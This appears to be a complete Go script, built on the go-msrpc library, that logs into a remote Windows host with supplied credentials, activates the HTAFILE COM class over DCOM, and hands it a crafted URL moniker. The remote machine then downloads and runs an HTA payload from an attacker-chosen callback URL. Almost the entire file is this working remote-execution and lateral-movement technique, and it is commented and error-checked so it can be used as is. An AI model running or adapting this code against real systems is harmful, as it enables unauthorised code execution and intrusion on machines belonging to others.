//go:build exclude
// Script that makes a remote machine load — and thereby execute — an HTA file (HTML application)
// fetched from a caller-supplied URL: it remotely activates the HTAFILE COM class over DCOM and
// hands it a URL moniker through IPersistMoniker::Load.
package main
import (
"context"
"encoding/binary"
"errors"
"flag"
"fmt"
"net"
"os"
"github.com/oiweiwei/go-msrpc/dcerpc"
"github.com/oiweiwei/go-msrpc/midl/uuid"
"github.com/oiweiwei/go-msrpc/msrpc/dcom/urlmon"
"github.com/oiweiwei/go-msrpc/msrpc/dcom/urlmon/imoniker/v0"
"github.com/oiweiwei/go-msrpc/msrpc/dcom/urlmon/ipersistmoniker/v0"
"github.com/oiweiwei/go-msrpc/msrpc/dtyp"
"github.com/oiweiwei/go-msrpc/ndr"
"github.com/oiweiwei/go-msrpc/text/encoding/utf16le"
"github.com/oiweiwei/go-msrpc/msrpc/dcom"
"github.com/oiweiwei/go-msrpc/msrpc/dcom/iactivation/v0"
"github.com/oiweiwei/go-msrpc/msrpc/dcom/iobjectexporter/v0"
"github.com/oiweiwei/go-msrpc/ssp"
"github.com/oiweiwei/go-msrpc/ssp/credential"
"github.com/oiweiwei/go-msrpc/ssp/gssapi"
"github.com/oiweiwei/go-msrpc/msrpc/erref/hresult"
_ "github.com/oiweiwei/go-msrpc/msrpc/erref/win32"
_ "github.com/oiweiwei/go-msrpc/msrpc/erref/wmi"
)
// Uri_CREATE_* flag values (as in Windows urlmon.h). They are written into the
// optional trailer of the serialized URL moniker (see URLMoniker.URIFlags); their
// meaning is defined by CreateUri, which the remote side presumably applies when
// it rebuilds the moniker. main uses only UriCreateCanonicalize|UriCreateCrackUnknownSchemes;
// the others are listed so callers can build different bitmasks.
const (
	UriCreateAllowRelative uint32 = 0x00000001 // accept a relative URI
	UriCreateAllowImplicitWildcardScheme uint32 = 0x00000002
	UriCreateAllowImplicitFileScheme uint32 = 0x00000004
	UriCreateNoFrag uint32 = 0x00000008
	UriCreateNoCanonicalize uint32 = 0x00000010
	UriCreateFileUseDosPath uint32 = 0x00000020
	UriCreateDecodeExtraInfo uint32 = 0x00000040
	UriCreateNoDecodeExtraInfo uint32 = 0x00000080
	UriCreateCanonicalize uint32 = 0x00000100 // used by main: canonicalize the URL on the remote side
	UriCreateCrackUnknownSchemes uint32 = 0x00000200 // used by main: parse schemes urlmon does not know
	UriCreateNoCrackUnknownSchemes uint32 = 0x00000400
	UriCreatePreProcessHTMLURI uint32 = 0x00000800
	UriCreateNoPreProcessHTMLURI uint32 = 0x00001000
	UriCreateIESettings uint32 = 0x00002000
	UriCreateNoIESettings uint32 = 0x00004000
	UriCreateNoEncodeForbiddenChars uint32 = 0x00008000
	UriCreateNormalizeIntlChars uint32 = 0x00010000
)
var (
	// callback is the -url flag: the URL the remote HTAFILE object is told to
	// load, i.e. where the HTA payload is served from.
	callback string
	// target is the -server flag (default: SERVER_NAME env var): the host whose
	// DCOM endpoint mapper (TCP 135) is dialed first.
	target string
	// serialGUID is the fixed GUID that MS-OSHARED places at the start of a URL
	// moniker's optional trailer, ahead of serialVersion and uriFlags.
	serialGUID = dtyp.GUIDFromUUID(uuid.MustParse("F4815879-1D3B-487F-AF2C-825DC4852763"))
	// htafileClassID is the CLSID of the "htafile" (HTML Application) class that
	// RemoteActivation instantiates on the target.
	htafileClassID = (*dcom.ClassID)(dtyp.GUIDFromUUID(uuid.MustParse("3050F4D8-98B5-11CF-BB82-00AA00BDCE0B")))
	// urlMonikerClassID is CLSID_StdURLMoniker; it is stamped into the custom
	// OBJREF so the remote side unmarshals our blob as a URL moniker.
	urlMonikerClassID = (*dcom.ClassID)(dtyp.GUIDFromUUID(uuid.MustParse("79EAC9E0-BAF9-11CE-8C82-00AA004BA90B")))
)
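// init registers authentication material and the command-line flags.
//
// Credentials are taken from the USERNAME and PASSWORD environment variables
// rather than flags (so they are not visible in the process argument list;
// they are still readable from the process environment by the same user).
// Only the SPNEGO and NTLM mechanisms are registered; no Kerberos mechanism
// is added here. Caveat for Windows operators: the OS pre-populates USERNAME
// with the logged-on account, so forgetting to set it silently picks that
// name rather than failing.
//
// NOTE(review): calling flag.Parse in init is normally a mistake (it runs
// before other packages can register flags and breaks `go test`); it is
// tolerable only because this file is a build-excluded single-file script.
func init() {
	user, pass := os.Getenv("USERNAME"), os.Getenv("PASSWORD")
	if user == "" || pass == "" {
		// The (possibly empty) credential is still registered, exactly as
		// before, but the most likely cause of a later auth failure is
		// surfaced up front instead of being silently swallowed.
		fmt.Fprintln(os.Stderr, "warning: USERNAME and/or PASSWORD environment variables are unset; authentication will likely fail")
	}
	gssapi.AddCredential(credential.NewFromPassword(user, pass))
	gssapi.AddMechanism(ssp.SPNEGO)
	gssapi.AddMechanism(ssp.NTLM)

	flag.StringVar(&callback, "url", "", "callback url")
	flag.StringVar(&target, "server", os.Getenv("SERVER_NAME"), "server name")
	flag.Parse()
}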
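// main validates the flags registered in init and runs the DCOM sequence.
// Any failure is reported on stderr with exit status 1; success is silent.
func main() {
	if callback == "" {
		fmt.Fprintln(os.Stderr, "callback url (-url) is required")
		flag.Usage()
		os.Exit(1)
	}
	if target == "" {
		fmt.Fprintln(os.Stderr, "target server (-server) is required")
		flag.Usage()
		os.Exit(1)
	}
	// run owns both RPC connections and closes them via defer before we
	// exit; an os.Exit inside its body would skip those defers.
	if err := run(gssapi.NewSecurityContext(context.Background()), target, callback); err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
}

// run performs the remote HTA execution against server in four steps:
//  1. ServerAlive2 on the well-known endpoint mapper port (135) to learn the
//     COM version the target speaks;
//  2. RemoteActivation of the HTAFILE class, requesting IPersistMoniker;
//  3. a second connection to the ncacn_ip_tcp endpoint the OXID bindings
//     advertise for the activated instance;
//  4. IPersistMoniker::Load with a custom-marshaled URL moniker for url,
//     which makes the remote HTAFILE object fetch url and treat it as an HTA.
//
// Both connections are closed on return. Every error carries the step it came
// from; an activation that the RPC layer reports as successful but whose
// HRESULT is non-zero is also returned as an error.
func run(ctx context.Context, server, url string) error {
	// Step 1: the ObjectExporter lives on the well-known endpoint 135.
	conn, err := dcerpc.Dial(ctx, net.JoinHostPort(server, "135"))
	if err != nil {
		return fmt.Errorf("dialing %s:135: %w", server, err)
	}
	defer conn.Close(ctx)

	// NOTE(review): WithSign gives integrity protection only; request bodies
	// (including url) cross the wire unencrypted. Use the library's
	// privacy/seal option instead if that matters in the target environment.
	exporter, err := iobjectexporter.NewObjectExporterClient(ctx, conn, dcerpc.WithSign(), dcerpc.WithTargetName(server))
	if err != nil {
		return fmt.Errorf("creating IObjectExporter client: %w", err)
	}
	srv, err := exporter.ServerAlive2(ctx, &iobjectexporter.ServerAlive2Request{})
	if err != nil {
		return fmt.Errorf("ServerAlive2: %w", err)
	}

	// Step 2: ask the activator to instantiate HTAFILE and hand back an
	// IPersistMoniker reference to it.
	activator, err := iactivation.NewActivationClient(ctx, conn, dcerpc.WithSign(), dcerpc.WithTargetName(server))
	if err != nil {
		return fmt.Errorf("creating IActivation client: %w", err)
	}
	act, err := activator.RemoteActivation(ctx, &iactivation.RemoteActivationRequest{
		ORPCThis: &dcom.ORPCThis{Version: srv.COMVersion},
		ClassID:  htafileClassID.GUID(),
		IIDs:     []*dcom.IID{ipersistmoniker.PersistMonikerIID},
		// 7 = ncacn_ip_tcp, 15 = ncacn_np; the server chooses from this list
		// when it publishes the OXID bindings dialed in step 3.
		RequestedProtocolSequences: []uint16{7, 15},
	})
	if err != nil {
		return fmt.Errorf("RemoteActivation: %w", err)
	}
	// The RPC itself can succeed while the activation fails; that outcome is
	// carried in the HRESULT rather than in err.
	if act.HResult != 0 {
		return fmt.Errorf("RemoteActivation returned %v", hresult.FromCode(uint32(act.HResult)))
	}
	// Exactly one interface was requested, so one object reference is
	// expected; a malformed reply must not become an index or nil panic.
	if len(act.InterfaceData) == 0 {
		return errors.New("RemoteActivation returned no interface data")
	}
	stdRef := act.InterfaceData[0].GetStandardObjectReference()
	if stdRef == nil {
		return errors.New("RemoteActivation did not return a standard object reference")
	}
	ipid := stdRef.Std.IPID // identifies the activated instance on the object exporter

	// Step 3: dial the activated instance on the endpoint it was exported on.
	// A separate variable keeps the port-135 connection alive and closable;
	// overwriting conn here would leak it.
	objConn, err := dcerpc.Dial(ctx, server,
		append(act.OXIDBindings.EndpointsByProtocol("ncacn_ip_tcp"), dcerpc.WithSign(), dcom.WithIPID(ipid))...)
	if err != nil {
		return fmt.Errorf("dialing activated instance: %w", err)
	}
	defer objConn.Close(ctx)

	persist, err := ipersistmoniker.NewPersistMonikerClient(ctx, objConn, dcom.WithIPID(ipid))
	if err != nil {
		return fmt.Errorf("creating IPersistMoniker client: %w", err)
	}

	// Step 4: wrap url in a URL moniker and have the remote HTAFILE load it.
	mon, err := getUrlMoniker(url, UriCreateCanonicalize|UriCreateCrackUnknownSchemes)
	if err != nil {
		return fmt.Errorf("building URL moniker: %w", err)
	}
	if _, err := persist.Load(ctx, &ipersistmoniker.LoadRequest{
		This: &dcom.ORPCThis{Version: srv.COMVersion},
		Name: mon,
	}); err != nil {
		// INET_E_INVALID_URL is the one urlmon error worth naming for the
		// operator; everything else is reported as-is instead of being dropped.
		if errors.Is(err, hresult.InetEInvalidUrl) {
			return fmt.Errorf("server rejected URL %q as invalid: %w", url, err)
		}
		return fmt.Errorf("IPersistMoniker::Load: %w", err)
	}
	return nil
}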
// URLMoniker is the serialized URL moniker layout described in MS-OSHARED:
// a 4-byte little-endian length (excluding the length field itself), the
// UTF-16LE NUL-terminated URL, and an optional trailer of serialGUID (16
// bytes), serialVersion (4) and uriFlags (4). Only marshaling is implemented
// in this file.
// See https://learn.microsoft.com/en-us/openspecs/office_file_formats/ms-oshared/4948a119-c4e4-46b6-9609-0525118552e8
type URLMoniker struct {
URL string // the URL; MarshalBinary encodes it as UTF-16LE with a terminating NUL
HasExtras bool // when true, MarshalBinary appends the serialGUID/SerialVersion/URIFlags trailer
SerialVersion uint32 // trailer field; should be 0 when HasExtras (getUrlMoniker leaves it zero)
URIFlags uint32 // trailer field: the Uri_CREATE_* bitmask (meaning per CreateUri)
}
// MarshalBinary implements encoding.BinaryMarshaler, producing the MS-OSHARED
// URL moniker byte layout:
//
//	uint32 LE length   (bytes following this field)
//	UTF-16LE URL + NUL
//	[serialGUID (16) | SerialVersion (4, LE) | URIFlags (4, LE)]   when HasExtras
//
// The only error source is the UTF-16 encoding of m.URL.
func (m URLMoniker) MarshalBinary() ([]byte, error) {
	encoded, err := utf16le.Encode(m.URL + "\x00")
	if err != nil {
		return nil, err
	}

	// Body size is everything after the length prefix.
	bodyLen := len(encoded)
	if m.HasExtras {
		bodyLen += 16 + 4 + 4
	}

	buf := make([]byte, 4, 4+bodyLen)
	binary.LittleEndian.PutUint32(buf, uint32(bodyLen))
	buf = append(buf, encoded...)

	if m.HasExtras {
		// Fixed 24-byte trailer; copy into a zeroed array so the GUID field
		// is always exactly 16 bytes regardless of what EncodeBinary yields.
		var trailer [24]byte
		copy(trailer[:16], serialGUID.UUID().EncodeBinary())
		binary.LittleEndian.PutUint32(trailer[16:20], m.SerialVersion)
		binary.LittleEndian.PutUint32(trailer[20:], m.URIFlags)
		buf = append(buf, trailer[:]...)
	}
	return buf, nil
}
// getUrlMoniker wraps url in a custom-marshaled OBJREF suitable for the Name
// argument of IPersistMoniker::Load. The OBJREF names CLSID_StdURLMoniker as
// the unmarshaling class and carries the MS-OSHARED URL moniker blob (with the
// serialGUID/flags trailer, SerialVersion left at 0) as its payload, so the
// remote side reconstructs a URL moniker for url using the given Uri_CREATE_*
// flags.
func getUrlMoniker(url string, flags uint32) (*urlmon.Moniker, error) {
	payload, err := URLMoniker{URL: url, HasExtras: true, URIFlags: flags}.MarshalBinary()
	if err != nil {
		return nil, err
	}

	custom := &dcom.ObjectReferenceCustom{
		ClassID:    urlMonikerClassID,
		Size:       uint32(len(payload)),
		ObjectData: payload,
	}
	ref := &dcom.ObjectReference{
		Signature: ([]byte)(dcom.ObjectReferenceCustomSignature),
		Flags:     dcom.ObjectReferenceTypeCustom,
		IID:       imoniker.MonikerIID,
		ObjectReference: &dcom.ObjectReference_ObjectReference{
			Value: &dcom.ObjectReference_Custom{Custom: custom},
		},
	}

	// ndr.Opaque is the encoding mode the original author chose for OBJREF
	// blobs; its exact effect is defined by the ndr package, not here.
	encoded, err := ndr.Marshal(ref, ndr.Opaque)
	if err != nil {
		return nil, err
	}
	return &urlmon.Moniker{Data: encoded}, nil
}